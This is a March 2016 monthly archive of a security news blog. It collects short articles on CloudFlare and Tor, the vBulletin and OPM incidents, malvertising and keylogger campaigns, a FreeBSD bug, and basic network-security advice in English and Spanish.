Month: March 2016

CloudFlare: 94 Percent of Tor Traffic Is Automated or Malicious

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CloudFlare explains how it deals with Tor traffic. After being accused of intentionally sabotaging Tor traffic last month, CloudFlare has come forward with an official statement in which it explains why the company does what it does.

Regular Tor users are well aware of CloudFlare’s practice of showing CAPTCHAs to users who are accessing the websites of their clients using a Tor exit node IP.

According to CloudFlare, this measure was implemented after it constantly saw Tor IPs being abused for suspicious activity.

CloudFlare shows CAPTCHAs to Tor users because it has to

“Based on data across the CloudFlare network, 94% of requests that we see across the Tor network are per se malicious,” CloudFlare wrote yesterday. “That doesn’t mean they are visiting controversial content, but instead that they are automated requests designed to harm our customers.”

This includes a large amount of comment spam, requests from vulnerability scanners, ad click fraud, content scraping, and login scanning.

On the matter of surveillance, also raised by members of the Tor Project, CloudFlare has denied that it tracks Tor users across its infrastructure, saying that they actually do the opposite, opting not to implement a super-cookie like system.

Nevertheless, CloudFlare admits that it does track and mark Tor exit node IP addresses and it also assigns them higher threat scores. Because the Tor Browser includes user anti-fingerprinting protection, and because CloudFlare says that it respects the project’s goal of providing anonymity to its users, it has no alternative than to show CAPTCHAs to users coming from a Tor-based IP.

The decision is controversial and will likely annoy legitimate Tor users, but to be fair, CloudFlare is a security firm, and all its clients hire its services for this purpose.

Most of CloudFlare’s clients would like to ban Tor traffic altogether

In fact, CloudFlare reveals that many of its clients would like to downright ban Tor traffic altogether, and it is only because of CloudFlare that this hasn’t happened yet.

The company explains that it intentionally left out options in its customer backend panel that would have allowed its clients to blacklist Tor, and only shows the option to whitelist Tor addresses or show a CAPTCHA field.

The decision was made because the company fears the scandal that would come with blacklisting Tor traffic altogether. CloudFlare understands why Tor was created in the first place and that it’s not the Tor Project’s fault that cyber-criminals are also using it.

The company has also recently started working with the Tor Project in order to create some sort of client-side solution in the Tor Browser itself, so CloudFlare and other security firms can distinguish legitimate Tor users from automated requests and ban the latter.

Additionally, CloudFlare also wants the Tor Project to start using SHA256 for generating .onion addresses. More of its clients could thus create .onion versions for their legitimate sites, where they could redirect Tor traffic and where CloudFlare wouldn’t have to display its CAPTCHAs, which in recent weeks have been failing at an astonishing high rate.


vBulletin resets passwords after a targeted attack

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vBulletin has suffered a severe attack last week that breached one of the Germany servers, in response it informed users that all passwords had been reset.

vBulletin has suffered a severe attack last week, in response it informed users that all passwords had been reset. According to the vBulletin developer Paul Marsden one of the Germany servers was breached by an unauthorized party.

“Due to the discovery yesterday of unauthorized access to of one of the VBG servers it is possible the hacker may have gained access to other vb systems as well. Therefore we have again taken the precaution of resetting all user password hashes. To be able to login to the site you will need to use the lost password functionality.
We apologise for any inconvenience this may cause.” said Marsden.

The attackers have breached the Germany (VBG – “”) server, a circumstance that could have allowed them to access other systems of the organization, including “” and “”

At the time I was writing there aren’t other details on the data breach, Marsden highlighted that hackers haven’t used any exploits, a claim supported by the fact that the hackers server doesn’t run any instance of the popular CMS.

Mardden believes attackers have carefully planned the attack:

“I can tell you it wasnt via any vB exploit – in fact, the VBG site doesnt run vbulletin. Someone clearly targetted the site, it was obvious they had planned this quite carefully.”said Marsden.

This isn’t the first time that the platform is targeted by hackers, in November 2015, the official forum was shut down after a hacker using the online moniker “Coldzer0” defaced it.

The website has been defaced and the forum was displaying the message “Hacked by Coldzer0.”

According to, vBulletin, Foxit Software forums have been hacked by Coldzer0 that stole hundreds of thousands of users’ records.

The hacker published screenshots that show he managed to upload a shell to the forum website and accessed user personal information, including user IDs, names, email addresses, security questions and answers, and password salts).

vBulletin forum hacked 2

As usual, I strongly suggest users to change the passwords on any other website where they shared the same login credentials.



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El motivo de los servicios de seguridad en redes informáticas es mantener seguro los activos de la información y proteger los recursos informáticos empresariales. Normalmente, las empresas se encuentran amenazadas por los riesgos y vulnerabilidades para estar conectadas al internet o manejar información confidencial de los clientes. Acerca de la seguridad de redes informáticas existen evidencias estadísticas avaladas por empresas de seguridad de redes informáticas que señalan que en los países como México, Brasil, Estados Unidos, Colombia, Argentina, UAE, India; dos de cada tres empresas sufrieron ataques sobre sus infraestructuras de redes informáticas (LAN).
Muchas empresas piensan que con el simple hecho de instalar un antivirus o cortafuego en la red ya están libres de riesgos, esto es un error muy común, hay riesgos relacionados con éstos, pero otros muchos que no lo están. Para preservar seguridad en redes informáticas, deben considerar todos los riesgos. Los riesgos informáticos pueden ser clasificados en riesgos externos y riesgos internos. Los riesgos externos se originan fuera de la red como un hacker externo de la red. Los riesgos internos se originan dentro de la red como un empleado o un hacker externo quien tiene acceso a los recursos de la red.
Según profesores del curso de seguridad en la red, los riesgos se presentan debido a las soluciones ineficientes de seguridad con las que cuentan las empresas y porque no existen conocimientos relacionados con la implementación de soluciones de seguridad en la red. Las soluciones de seguridad en redes informáticas protejan los recursos informáticos de los riesgos externos e internos. Además, la seguridad en redes informáticas es la clave para cumplir con las normas de protección de datos y conseguir la confianza de los clientes, mencionan los expertos de empresas de seguridad de redes informáticas. A continuación se presentan algunos de los mecanismos para mejorar la seguridad de red inalámbrica y alámbrica.



Si está configurando una red alámbrica, puede seguir algunos de los siguientes mecanismos de seguridad en redes informáticas recomendados por empresas de seguridad de redes informáticas.

  • Según el curso de seguridad en la red, para aumentar la seguridad en la red, debe activar la actualización automática de cada equipo y dispositivo de la red. Los sistemas operativos pueden instalar actualizaciones importantes automáticamente. Una actualización puede incluir parches de algunas vulnerabilidades, actualización para mejorar la experiencia del usuario y rendimiento.
  • Use un cortafuego/firewall que podría impedir los hackers que obtengan acceso a los recursos de la red. Un cortafuego permite controlar el acceso y filtra todas las comunicaciones en la red.
  • Implementar otras soluciones de seguridad de la red junto con cortafuegos permite aislar redes para evitar que cierto tipo de información fluya. Consultores de empresa de seguridad de redes, señalan que un firewall puede permitir accesos a la red local desde Internet si el usuario se ha autentificado como usuario interno. También los cortafuegos pueden tener la funcionalidad de Anti-Spam o debe usar una solución de Anti-Spam.
  • Los virus pueden meterse en una computadora por spam, discos duros, USB, CDs o por archivos que se descargan de Internet. Ya que cada día hay nuevos virus, debe actualizar el software antivirus de forma periódica. Los antivirus ayudan en la detección y en ocasiones, en la destrucción de virus. Según experiencia de los expertos de soluciones de seguridad de redes, existen diferentes tipos de soluciones de antivirus en el mercado. Consultores de empresa de seguridad de redes, señalan que los usuarios generales pueden usar antivirus gratis como de Avast pero los usuarios empresariales deben usar una solución adecuada dependiendo de tipo de infraestructura informática.
  • Use IDS- IPS (Sistema de detección de intrusos y prevención de intrusos). IDS- IPS son servicios de seguridad en redes que permiten detección de intrusos y prevención de intrusos. Un IDS/IPS detecta en una manera proactiva patrones complejos de tráfico y da una capacidad de responder a cualquier ataque inminente en su red. Según expertos de soluciones de seguridad de redes, sistema de detección de intrusos y prevención de intrusos es un software/hardware usado para detectar ataques cibernéticos a un computador o a una red. Los eventos generados por IDS/IPS debe ser supervisados por su equipo de TI o puede tomar ayuda de empresa de seguridad de redes informáticas quien con susservicios de seguridad en redes analizarán el tráfico de la red en tiempo real.
  • VLAN (LAN virtual) es un procedimiento de crear redes lógicamente independientes dentro de una red informática. Una red informática podría tener varias redes virtuales. VLAN es una de las importantes soluciones de seguridad de redes que divide los grupos de usuarios de una red física real en segmentos de redes lógicas. Explica profesor de curso de seguridad en la red que una VLAN consiste en una red de computadoras que se comportan como si estuvieron conectados al mismo conmutador. Usted puede configurar las VLANs mediante software en lugar de hardware, lo que las hace considerablemente flexibles. Para implementar más seguridad, puede aprender como configurar Prívate VLAN, Micro VLAN con el curso de seguridad en la red.
  • Una lista de control de acceso o ACL se usan para implementar seguridad lógica. ACL es uno de los mecanismos de seguridad en redes informáticas que ayuda determinar los permisos de acceso apropiados a un recurso de la red. ACL filtra tráfico de la red y solo permite el tráfico de red de acuerdo a alguna condición. Además ACL controla el flujo del tráfico en computadores, enrutadores y conmutadores de la red. Conforme los especialistas de los servicios de seguridad en redes la lista de control de acceso es una necesidad básica por cualquier red. Debe configurar reglas que detallan puertos de servicio, nombres de dominios, nombres de terminales junto con los permisos en ACL. Una combinación de VLAN y ACL es muy bueno para seguridad y puede aprender como configurar VLAN ACL’s con la capacitación de seguridad de redes.
  • Implementar mecanismos de seguridad en redes informáticas como IPsec (Internet Protocol security) por encriptación. IPsec es un conjunto de protocolos cuya función es asegurar las comunicaciones en la capa de red y en la capa de transporte, tanto en TCP como en UDP. IPsec ayuda en autenticación y encriptación de los paquetes. Según los especialistas de los servicios de seguridad en redes, IPsec es muy flexible, ya que puede ser utilizado para proteger protocolo de Internet (IP) y protocolo de transporte (TCP, UDP). Puede usar IPsec junto con las aplicaciones que usan SSL o TLS. También puede usar VPN por comunicaciones críticas o implementar una solución completa de IPsec.
  • Instalar servidores de TFTP, RADIUS dependiendo de las necesidades junto con otras soluciones de seguridad de redes mencionadas antes.
  • Activar servidores de logs que le ayudará grabar todo la actividad en la red. Acuerdo con los profesores de la capacitación de seguridad de redes este mecanismo es muy importante para hacer un seguimiento cuando se produce un incidente de seguridad.
  • Asegura las configuraciones de los equipos de la red y selecciona una configuración sabiendo el propósito de la configuración. Además debe cambiar los parámetros y configuraciones por defecto de conmutadores, enrutador etc. Por parte de las aplicaciones de la red, los expertos de servicios de seguridad en redes aconsejan que deba desactivar servicios que no se utilizan. Por lo tanto revisa en todos los sistemas qué servicios utilizan, y si no le sirven, desactiva y desinstala.
  • Tomar ayuda de proveedores/empresas de seguridad de redes para implementar políticas de seguridad, copias de seguridad y hacer auditoria de seguridad de la red junto con test de detección de intrusos y vulnerabilidades.


Si está configurando una red inalámbrica, puede seguir algunos de los siguientes mecanismos de seguridad en redes inalámbricas recomendados por empresas de seguridad de redes informáticas.

  • Debe configurar una clave de seguridad de red inalámbrica con WPA2-PSK activado. Con el cifrado activado, nadie podrá conectarse a su red sin la clave de seguridad y es muy difícil de hacer fuerza bruta. Esto ayudaría a impedir los intentos de acceso no autorizado a la red. Debe tener una clave de seguridad muy fuerte para que los ataques de diccionario no puedan romper la clave.
  • Debe cambiar el nombre y la contraseña de administrador predeterminados del enrutador o el punto de acceso. Además debe cambiar nombre de red inalámbrica predeterminado conocido como identificador de red (SSID). Puede usar alguna solución de seguridad de redes inalámbrica que ayudará cambiar las claves, contraseñas y SSID periódicamente.
  • Debe seleccionar la ubicación del enrutador o el punto de acceso cuidadosamente para que la señal no llegue afuera de sus instalaciones.
  • Puede filtrar direcciones MAC y permitir acceso al WiFi a los dispositivos conocidos. También hay opción de ocultar SSID para qué no está visible en búsqueda normal de redes disponibles.

Estos mecanismos de seguridad en redes informáticas son básicos para implementar seguridad en la red alámbrica e inalámbrica. Por seguridad avanzada, debe tomar ayuda de una empresa de seguridad de redes informáticas o tomar curso de seguridad en la red para implementar soluciones avanzadas.

Top 10 Tips To Protect Yourself From Hackers

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Follow these Top 10 Tech Security Tips To Keep Yourself Safe From Hackers.If you are surfing the net or your computer is linked in anyway to Internet, you would be aware of the risks that cyber criminals pose to you. Computer security, also known as cybersecurity or IT security, is the protection of information systems from theft or damage to the hardware, the software, and to the information on them, as well as from disruption or misdirection of the services they provide. On the other hand, data security means protecting data, such as a database, from destructive forces and from the unwanted actions of unauthorized users.

Top 10 Tips To Protect Yourself From Hackers

Every computer user needs to know the basic things to keep their device and data secure. Given below are the few tips and habits that can help you:

10. Look Out for Social Engineering Attacks

Social engineering is the biggest security concern these days, as cyber thieves and hackers smartly gain access to your secure information either through mimicking other companies, phishing and other common strategies. You need to be careful of all the suspicious phone calls, emails, links and other communications that you receive. Also, it is known that most of the data breaches come from internal sources. Hence, awareness is the important key, as it may be astonishing to know that even security experts can be easily tricked or hacked into.

9. Make Your Phone’s Lock Code More Secure

Many of us consider that the default 4-digit PIN is the most secure locking code. However, it is not. It is always better to add an extra digit to make your phone more secure. For iOS and Android, go to settings and add one more digit to make your phone’s lock code more. Further, Android also has lock screen tools that lets you enhance your phone’s security. Lastly, it is recommended to change your PIN if it’s one of these.

8. Always Back Up Your Computer/Smartphone

It is vital to frequently backup and make duplicate copies of all your important data to keep it safe. You can use a backup system with CrashPlan, or Windows’ built-in tools or Mac’s Time Machine.

7. Install the Best Antivirus and Anti-Malware Software

To keep viruses and malware at bay, it is suggested that you use one antivirus tool, such as Sophos Anti-Virus for Mac or such as Avira for Windows, as well as an anti-malware tool for on-demand scanning, such as Malwarebytes.

6. Lock Down Your Wireless Router

The first line of defense for your home network is your router. To keep your Wi-Fi secure, you need to change the router’s administrator login, use WPA2 (AES) encryption, and change other basic settings.

5. Never Send Sensitive Information Over Email Unless It’s Encrypted

Sensitive information, such as your bank info, social security number, tax returns, or confidential business info, should never be sent over email without encryption. It’s too risky. Encrypt files with one of these tools before sending them or use a service like super simple ProtonMail or encrypt your emails with PGP. Encrypt all the things.

4. Don’t Use Public Wi-Fi Without A VPN

While using public Wi-Fi, it is important to use a network that has security. To stay safe on public Wi-Fi networks, your best defense will be to use a VPN (Virtual Private Network), which keeps you safe even in other conditions too.

3. Use A Password Manager

It is impossible to remember every password for each and every site and service you use. That’s where password managers come handy. While security and convenience are the features that you need to look for, however, select the password that has the features you need.

2. Use Two-Factor Verification

Two-factor authentication offers the extra layer of security that protects you in case your password gets stolen. Turn this feature on in all the places where you can use TwoFactorAuth. Further, if you lose your phone (most often used as the authentication device), you can still get back into your account if you plan ahead.

10. Frequently Review Your App Permissions and Security Settings

Lastly, you still have to be watchful and make sure your software is always up-to-date besides following the above steps. Always remember to update the router firmware or regularly clean up app permissions, such as Facebook, Twitter, Google or use a site like MyPermissions to clean up multiple services. You can even get a bonus for keeping up with your security needs, as Google sometimes offers free storage just for doing a security check.


How does it feel like to be a part of Anonymous explains Female Hacker

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Female member of Anonymous explains what it is like to be a part of the worldwide hacktivist group.Anonymous – The name generates awe in some while others view it with derision as being a group of script kiddies. Anonymous is a loosely associated international network of activist and hacktivist entities. It has no central leadership and can be loosely termed as a Internet gathering of like minded people. Anonymous began from a 4Chan board in 2003 and went on to become world’s premier hacktivism group. They have had their successes and misses in online campaigns and are famous for their DDoS attacks on corporate websites.

How does it feel like to be a part of Anonymous explains Female Hacker

Their latest flagship campaign which is underway is #OpISIS against the Islamic State of Iraq and Syria. This campaign was announced after the gruesome killings of innocent bystanders at Charlie Hebdo headquarters in Paris and was reinvigorated after the Paris and Brussels terror attacks. Under this campaign, Anonymous hacktivists have brought down thousands of ISIS linked websites and got Twitter and Facebook to ban propaganda pages belonging to ISIS affiliates.

What does it feel to a member of such an organisation. A female member of GhostSec, which is affiliated to Anonymous and a vital partner in #OpISIS, spoke to Huffington Post about how it feels to a female member of the hacktivist group.

The female hacker who chose to remain unnamed said that she was from United States and was working in computer field. When asked about how she felt working with GhostSec, she notes that, “I absolutely love my participation in GhostSec. When there’s something like this happening around the world (terrorism), I have trouble sitting on the sidelines. I’m happy to be involved in the fight against ISIS.”

She also confirmed about the shift in hacking tactics of Anonymous after the Paris attacks. “Currently, we are more focused on intel collection than on shutting websites down. So, we scour the Internet ­ social media, websites and the Darknet for terrorist activity. We then analyse data for threats, propaganda, etc. Any actionable intel is sent to the appropriate law­ enforcement agency,” she said.

Anonymous has been at the forefront of reporting terrorists related social media accounts of Facebook and Twitter. However, now there is a automated service which looks after that, the hacker noted,

“We no longer deal with reporting social media accounts. There are automated services, such as CtrlSec, which do that. So, that frees us up for intel collection. When I collect intel I usually leave the site up so that law­ enforcement can also analyse it and then they can shut the site down,” she said.

“Particularly egregious terror sites we shut down immediately due to the imminent danger they present. Terrorist sites that recruit fall under this category,” the hacker added.

The female hacker joined GhostSec and Anonymous after they launched #OpISIS, “I started helping them shortly after GhostSec joined #OpISIS. I was impressed with them and the work that they did and eventually ended up joining,” she notes.

When asked about how it feels to a female hacker, she said this about preconception of female hackers around the world, “Not that I’m aware of. People are a little more curious about it. But, I haven’t observed any discrimination of female hackers.”

When asked of her final words to describe Anonymous, she noted,

“One thing a lot of people seem to not be aware of is that Anonymous is a collective made up of many different groups and individuals with viewpoints across the political spectrum.

Often people are puzzled when they read that Anonymous has done something that seems totally opposite of the collective’s philosophy. There is no one philosophy, really.


Sophisticated Malvertising Campaign Abusing Baidu API Goes On for Five Months

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In wake of recent discovery, Baidu decides to disallow user-defined scripts and Flash content in its ads. A malvertising campaign has been ravaging Chinese users, employing the Baidu advertising platform, and abusing one of its ad APIs to push malware on the users’ computers.

The malicious campaign was first spotted in October 2015, but due to its highly sophisticated and multi-stage infection techniques, it was only understood and stopped in February 2016.

According to security researchers from FireEye, the attacker behind this campaign was using one of Baidu’s ad APIs to create malicious ads, which would later be displayed on legitimate websites.

Malicious content was (re)constructed on the client-side

The ad API allowed the crooks to embed a simple HTML redirector in the Baidu code responsible for loading the ads. This redirector would start a series of JS-based loops, which would load code after code, eventually landing a malicious iframe on the legitimate website.

A second iframe would be loaded later, and both would combine their own set of parameters that would be merged and form the URL where the actual malicious script resided. The malicious ad code would then instruct the user’s browser to download and automatically execute this script, which was a VBScript file.

In turn, this VBScript downloaded a trojan named Win32/Jongiti, which is a multi-purpose malware downloader that connected to a C&C server and downloaded other threats, based on the attacker’s instructions.

FireEye says that, while it monitored this campaign, it saw Jongiti download PUPs, keyloggers and pornographic content droppers.

As FireEye noted, the attack seems to be extremely effective against users running older IE versions, who are quite numerous in China. The attack doesn’t work on IE11, due to recent security measures added to the browser.

Baidu took security measures to prevent future attacks

After making their discovery, the security vendor contacted Baidu, who addressed the issue and even introduced some changes to its API service to prevent future abuses.

First of all, after March 31, Baidu will stop allowing users to upload custom scripts and Flash on its ad platform. This is a major move since this means that attackers wouldn’t be able to host malvertising content on Baidu’s platform and would need to find new techniques to exploit its service.

Secondly, Baidu has also made it mandatory for all new accounts to register using a phone number and domain name registration record. In China, these two have a real-name enforcement policy and will allow the company to track down attackers and hand them over to the police.

Malvertising campaign was using different vectors to hide malicious content

Malvertising campaign was using different vectors to hide malicious content


Tor Project says it can quickly catch spying code

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The organization has worked for three years to improve its ability to catch fraudulent software. The Tor Project is fortifying its software so that it can quickly detect if its network is tampered with for surveillance purposes, a top developer for the volunteer project wrote on Monday.

There are worries that Tor could either be technically subverted or subject to court orders, which could force the project to turn over critical information that would undermine its security, similar to the standoff between Apple and the U.S. Department of Justice.

Tor developers are now designing the system in such a way that many people can verify if code has been changed and “eliminate single points of failure,”wrote Mike Perry, lead developer of the Tor Browser, on Monday.


Over the last few years, Tor has concentrated on enabling users to take its source code and create their “deterministic builds” of Tor that can be verified using the organization’s public cryptographic keys and other public copies of the application.

“Even if a government or a criminal obtains our cryptographic keys, our distributed network and its users would be able to detect this fact and report it to us as a security issue,” Perry wrote. “From an engineering perspective, our code review and open source development processes make it likely that such a backdoor would be quickly discovered.”

Two cryptographic keys would be required for a tampered version of the Tor Browser to be distributed without at least initially tripping security checks: the SSL/TLS key that secures the connection between a user and Tor Project servers plus the key used to sign a software update.

“Right now, two keys are required, and those keys are not accessible by the same people,” Perry wrote in a Q&A near the end of the post. “They are also secured in different ways.”

Even if an attacker obtained the keys, in theory people would be able to check the software’s hash and figure out if it may have been tampered with.

Apple is fighting a federal court’s order to create a special version of iOS 9 that would remove security protections on an iPhone 5c used by Syed Rizwan Farook, one of the San Bernardino mass shooters.

A ruling against Apple is widely feared by technology companies, as it could give the government wider leverage to order companies to undermine encryption systems in their products.

On Monday, the Justice Department indicated it is investigating an alternative method to crack Farook’s iPhone, which if successful would not require Apple’s assistance.

Perry wrote that the Tor Project stands “with Apple to defend strong encryption and to oppose government pressure to weaken it. We will never backdoor our software.”

Tor, short for The Onion Router, is a network that provides more anonymous browsing across the Internet using a customized Firefox Web browser.  The project was started by the U.S. Naval Research Laboratory but is now maintained by the nonprofit Tor Project.

Web browsing traffic is encrypted and routed through random proxy servers, making it harder to figure out the true IP address of a computer. Tor is a critical tool for activists and dissidents, as it provides a stronger layer of privacy and anonymity.

But some functions of Tor have also been embraced by cybercriminals, which has prompted interest from law enforcement. Thousands of websites run as Tor “hidden” services, which have a special “.onion” URL and are only accessible using the customized browser.

The Silk Road, the underground market shut down by the FBI in October 2013, is one of the most infamous sites to use the hidden services feature.



Don’t want your new system getting hacked? Follow these 13 steps and you might just avoid it

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Government IT security agency sets out guidance for building services that hackers will find difficult to break.

The IT security arm of UK surveillance agency GCHQ has issued a series of guidelines aimed at building secure online services.

Government services that make use of sensitive data are regular targets of hackers, and as CESG – the information assurance arm of the spy agency – notes when such attacks are successful the fallout can be damaging, expensive and embarrassing for the organisations involved.

Intelligence agency GCHQ – of which CESG is a part – knows a thing or two about hacking, of course, (and the UK government is currently steering new legislation through parliament which could help better define when GCHQ and other parts of law enforcement are permitted to carry out hacking).

CESG said that in many cases, the worst case hacking scenario can be avoided if services are designed and operated with security as a core consideration. It has published a set of design principles which it says can help create services which are resilient to attack and easier to manage and update.

There are four sets of guidelines: the first outlining seven points to consider before starting a project, the second setting out 11 ways to making services harder to compromise, the third 13 methods to minimise the impact of any successful attack and the last detailing seven approaches for detecting and managing attacks.

CESG said that its own investigations found that hackers used widely available tools to exploit basic vulnerabilities and said these sorts of ‘commodity’ attacks can be stopped by well-designed systems. Its recommendations around making services hard to compromise include:

1. Validate or transform all external input before processing it: Simple data formats that can be validated are preferred to complex formats. It notes that it is very difficult to check for malicious code in complex file formats such as PDFs or spreadsheets, so this content should be transformed into another format to ‘neuter’ any malicious content.

2. Render untrusted content in a disposable environment: Render any untrusted and complex content you receive from an external source in an environment designed to safely handle malware. Consider using virtualisation, it says, to create an environment that is reset after processing potentially malicious content.

3. Only import trustworthy software and verify its legitimacy: Use software which has signatures you can verify to prove its integrity, and do this automatically.

4. Design for easy maintenance: Check for patches regularly: frequent small updates are preferred over infrequent large updates.

5. Use tried and tested frameworks: Writing your own software from scratch rather than building upon a common framework is a high-risk strategy, it warns.

6. Reduce your attack surface: Only expose the minimum interfaces necessary: when building upon common frameworks, disable any components and libraries you don’t need.

7. Users with access to data should be identified and authenticated: Data should only be released after verifying the identity, authentication status and appropriate attributes of the user.

8. Make it easy for administrators to manage access control: Having a unified view of access control for the service can help administrators maintain granted permissions more easily.

9. Don’t build your own cryptographic protections: You should only use existing algorithms and protocols, preferably using those exposed by your chosen software stack.

10. Protect against spear-phishing and watering-hole attacks: Systems administrators should not view email or browse the web from their administrative account or device.

11. Make it easy for users to do the right thing: Security breaches often occur because users have developed workarounds for system inadequacies: make the easiest method for users to use your service the most secure.


FreeBSD crushes system-crashing bug

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Sysadmins ought to patch their FreeBSD systems after an irritating bug was found in the kernel.

A programming blunder involving integer signedness can be exploited by a logged-in user to crash a system. With the right parameters, you can trick the kernel into clearing too much of its heap memory with zeros via the sysarch system call, which will eventually lead to a kernel panic.

 French bulldog puppy wears plastic devil horns and cute expression. Photo by Shutterstock

The bug was discovered by researchers at Core Security, who alerted the FreeBSD team on March 2, and patches were released on March 16. The flaw is present in all supported versions of FreeBSD.

A technical description of the bug and proof-of-concept code to trigger it can be found in an advisory from Core Security here. Other details of the vulnerability from the FreeBSD team are available over here.


Olympic Vision Keylogger Spread via BEC Scams in 18 Countries

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Olympic Vision is an advanced threat that can steal key strokes, clipboard data, and user credentials.Cyber-criminal groups are using a combination of BEC (Business Email Compromise) scams and advanced keyloggers to target, scan, and steal data from 18 countries around the world.

At the core of this attack is a new malware family with keylogging and info-stealing capabilities, which the Trend Micro researchers have named Olympic Vision.

Available on the Dark Web for as much as $25 (€22), this keylogger can do a lot of things, such as log key strokes, record and steal data from the clipboard, take desktop screenshots, and extract passwords from browsers, email, and FTP clients.

Olympic Vision is spread around via BEC scams

To spread it around, the criminals were launching precise email campaigns aimed at key employees inside their targeted companies.

Known as BEC scams, and sometimes as whaling attacks or CEO fraud, these emails are crafted to look like they’re coming from a business partner or another company employee.

Each email had a file attached, and in this particular campaign, it was the Olympic Vision keylogger, which would execute, collect data, and send it to the attacker.

The criminals would then sift through the logs and decide what company computer to attack, based on the data they stole from each, separating uninteresting workstations from the ones sitting on some manager’s desk or the company’s financial department.

Campaign targeted European, North American, and Asian companies

Targeted countries were spread equally around the globe, with attackers having hit China, India, Indonesia, Malaysia, Thailand, Canada, United States, Germany, Iran, Iraq, Netherlands, Qatar, Saudi Arabia, Slovakia, Spain, United Arab Emirates, United Kingdom, and Zimbabwe.

This is not the first time keyloggers have been used together with BEC scams, with Trend Micro having previously reported on other threats such as Predator Pain, Limitless, and HawkEye.

According to Mimecast, a cyber-security vendor specialized in email security, BEC scams rose 55% in 2015 compared to the previous year.

Olympic Vision control panel

Olympic Vision control panel

OPM Left Internal System Vulnerable to a Known Attack for Weeks

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The Office of Personnel Management (OPM), which was infamously hacked last year, today announced it fixed a serious vulnerability affecting a potentially sensitive part of its network after being informed of it by Motherboard.

An encryption certificate associated with an OPM sub-domain was vulnerable to the so-called DROWN attack, which was announced earlier this month. With DROWN, resourceful attackers can crack encrypted traffic, and then steal passwords and other sensitive information from affected sites in a matter of hours.

“As numerous worldwide internet vulnerabilities are discovered almost daily, OPM, on a routine basis, takes immediate steps to remediate vulnerabilities as they become known to us—as was the case with the recent DROWN vulnerability,” Samuel Schumach, press secretary for the OPM told Motherboard in an email.

Motherboard first told OPM about the vulnerable certificate on Tuesday, and the problem had been fixed by the following day.

“OPM’s ability to respond and address issues such as these shows our significant progress in vulnerability remediation and incident response,” Schumach continued.


The vulnerable certificate was discovered after Motherboard investigated an OPM “Secure Portal User Login” page. Taking the URL of that page, and pasting it into thefree, online tool to check for sites vulnerable to DROWN, revealed that a certificate for a related section of the system was affected by the attack.

“It’s clearly difficult for large organizations to secure their infrastructure.”

The now-fixed certificate included the sub-domain “pips,” which refers to Personnel Investigation Processing System. The OPM would not comment on what information was transmitted with this certificate, but according to a government website, “PIPS is an automated system which houses the Security/Suitability Investigations Index (SII) and is used by Federal Investigative Services at the U.S. Office of Personnel Management (OPM-FIS) for the automated entry, scheduling, case control and closing of background investigations.” An OPM document adds that PIPS “supports the core investigative processed such as the entry of the investigative data.”

As for the attack itself, DROWN works on sites which inadvertently expose their encryption keys through the use of SSLv2, a precursor to Transport Layer Security (TLS), which is used to encrypt data in transit. In short, an attacker can decrypt a TLS session by repeatedly forcing connections to the target using SSLv2, and each time build up a picture of the encryption key. When Ars Technica reported on the researchat the start of the month, more than 11 million websites and e-mail services were vulnerable to DROWN.

“Having SSLv2 still enabled is a sign of having antique infrastructure that might have other vulnerabilities,” Nadia Heninger, assistant professor in computer and information science at the University of Pennsylvania, and one of the co-authors ofthe DROWN paper, told Motherboard in an online chat. Although the DROWN problem has been fixed, she pointed out that the sub-domain was perhaps vulnerableto FREAK, another encryption-related attack from last year. It appears to also be affected by POODLE, a third attack from 2014.

Talking about DROWN and FREAK, Heninger said, “These are interesting cryptographic vulnerabilities, but the more pressing broader issue here is how hard it is, even for the government, to secure itself against attacks. SSLv2 and export cipher suites have been deprecated for 15-20 years.”

“It’s clearly difficult for large organizations to secure their infrastructure,” she added.

While the certificate for the PIPS sub-domain was vulnerable, the keys for the login page itself appear to be up to date, Haninger pointed out.

But, depending on what information was being transmitted with the weak certificate, sensitive information could still have been exposed.

On Tuesday, acting OPM Director Beth Cobert tried to convince lawmakers to provide $37 million to migrate the agency from older machines over to modern equivalents. For the meantime, old and new systems will be run side-by-side, however.

The agency’s catastrophic hack included 5.6 million fingerprints, and sensitive information on at least a staggering 32 million federal employees.

When it comes to this latest, albeit smaller blunder, “It’s pathetic that it has to be pointed out by someone from the outside; that such an obvious vulnerability exists in such a sensitive place,” Michael Adams, an information security expert and former US Special Operations Command Sergeant Major, told Motherboard in a phone call.


This Is Why We Can’t Have Encryption Backdoors: US, UK Police Abuse Their Powers

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Two reports show potential dangers of encryption backdoors. Two reports released in the past week have revealed what most of us had already suspected: that police officers, no matter the country, will abuse their rights and access or keep sensitive information on people who have not yet committed a crime or have not been charged with one officially.

The Associated Press has revealed the first of these two cases, citing a report released yesterday by an independent police monitoring agency that has been keeping an eye on the actions of the Denver city police.


US officers abuse national database for personal reasons

The report shows that, in the past ten years, over 25 Denver police officers have illegally accessed the National Crime Information Center (NCIC) database, which keeps information on US citizens, personal details, and criminal records.

The report cites incidents when police officers used this database for personal reasons, such as to learn a woman’s phone number, run license plates for friends, or even gather intel before the officer themselves committed a crime.

The independent monitoring has agency has also revealed that no officers have been charged for their actions, and that in the past ten years, no policeman has received a penalty harsher than a three-day suspension.

UK police officers forget to delete biometrics data

The second report on police officers abusing their powers, or more accurately, misusing sensitive electronic information, comes from the UK, where the Biometrics Commissioner has released his annual report.

The commissioner notes that British police is not following normal procedures regarding biometrics data, such as fingerprints and DNA evidence.

Once a suspect is released from police custody without being charged or without being placed on bail, UK police procedures dictate that the biometrics data collected on the suspect must be deleted.

Even if the suspect continues to be under an official investigation, if no charges have been filed, this data must be deleted. If police officers want to keep the biometrics data, they have to follow a certain procedure to do so.

The commissioner says that UK police officers are not following this procedure and have built a database of illegally acquired biometrics information, which they are now using within their investigations.

Since this database is set to automatically delete biometrics data, Britain’s Biometrics Commissioner says that police officers have rigged their system in order to retain that information.

Do you still want encryption backdoor?

With the Apple vs. FBI debate still raging on, and with authorities in the US and some other European and Asian countries still thinking about requiring encryption backdoors, these two reports highlight the dangers of such procedures.

So-called key escrow systems, where law enforcement will have a copy of the encryption key were considered unsafe because they could have allowed a hacker to steal a key and then compromise the entire encryption channel.

These two reports are now also showing that the investigators’ human nature will also play a key role. If an encryption backdoor is provided, then there’s nothing standing in the way of a rogue police officer abusing this power.

With many government watchdog agencies in the US decrying the militarization of police forces, giving law enforcement, at any type of level, access to encrypted communications seems like the wrong thing to do right now.

Recomendación para proteger las contraseñas en base de datos de una aplicación

